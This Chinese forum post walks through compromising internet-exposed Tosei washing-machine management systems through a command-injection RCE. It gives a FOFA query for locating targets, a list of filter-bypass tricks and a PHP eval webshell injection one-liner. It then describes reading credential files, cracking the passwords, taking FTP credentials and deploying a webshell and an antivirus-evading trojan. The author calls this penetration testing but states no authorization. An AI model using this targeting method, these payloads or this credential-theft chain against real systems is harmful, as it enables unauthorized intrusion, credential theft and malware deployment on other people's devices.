找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

2364

积分

1

好友

322

主题
发表于 2025-12-1 09:54:37 | 查看: 46| 回复: 0

信息收集

近期曝光的东正洗衣机RCE漏洞引发广泛关注,通过特定特征可快速定位目标资产。

语法

fofa: body="tosei_login_check.php"

目标系统登录界面如下:
图片

漏洞验证POC如下:
通过后台测试功能实现管道符绕过
图片

成功实现远程代码执行

打点过程

命令注入漏洞利用过程中,需要掌握常见的绕过技术:

1.管道符
2.拼接字符串 windows: ~%xxx:0~1  linux: $xxx:start,length
3.特殊符号^,"",(),$@
4.空格绕过, ${IFS},{}
5.变量赋值
6.默认路径 通配符
7.hex编码 xxd
8.base64编码
9.分号绕过
10.``绕过
11. \ 绕过
12. dnslog绕过

尝试上传Webshell:

IFS=,;`cat<<<'<?php @eval($_POST[1]);?>'>5.php`

目标系统无法执行该命令,经检测发现目标机器无法出网,缺乏ping和curl功能,且无目录写入权限。

本机信息收集

查看当前目录:

pwd

图片

列出目录内容:

ls${IFS}-lah

图片

所有文件均无写入权限,尝试tmp目录:
图片

tmp目录仅支持创建文件,web目录同样无法写入。

密码破解

查看/etc/passwd文件发现关键信息:
图片

通过分析passwd文件结构:

用户名:密码:用户 ID:用户组 ID:注释:用户目录:登录 shell

成功破解两个账户密码:
图片
图片

但22端口拒绝连接。

发现htaccess文件

分析.htaccess配置文件:
图片

配置文件暴露了权限控制目标用户,对应文件位置:
图片

直接读取密码文件:

cat /usr/apache/.pass

获取关键凭证:
图片
图片

成功破解多个账户密码组合。

登录测试

进入管理页面

使用获取的凭证成功登录系统:
图片

命令注入点确认

之前利用的命令注入漏洞位置:
图片

FTP服务器发现

FTP服务配置中发现关键信息:
图片

通过开发者工具查看明文密码:
图片

成功连接FTP服务:
图片

文件上传操作

通过FTP put和lcd命令实现文件上传下载,成功部署Webshell:
图片

免杀木马部署

上传免杀木马并成功上线:
图片

后记

本次渗透测试发现:

  1. 目标环境无域控架构,但涉及多个关联域名资产
  2. 相同资产存在相同的利用链,均存在默认账号密码问题
  3. 多数目标部署防护措施,需要采用免杀技术规避检测



上一篇:JavaScript商标争议解析:Oracle法律风险与开发者权益保护
下一篇:提示工程实战指南:核心技巧与模型配置最佳实践
您需要登录后才可以回帖 登录 | 立即注册

手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )

GMT+8, 2026-1-16 08:06 , Processed in 0.212468 second(s), 39 queries , Gzip On.

Powered by Discuz! X3.5

© 2025-2025 云栈社区.

快速回复 返回顶部 返回列表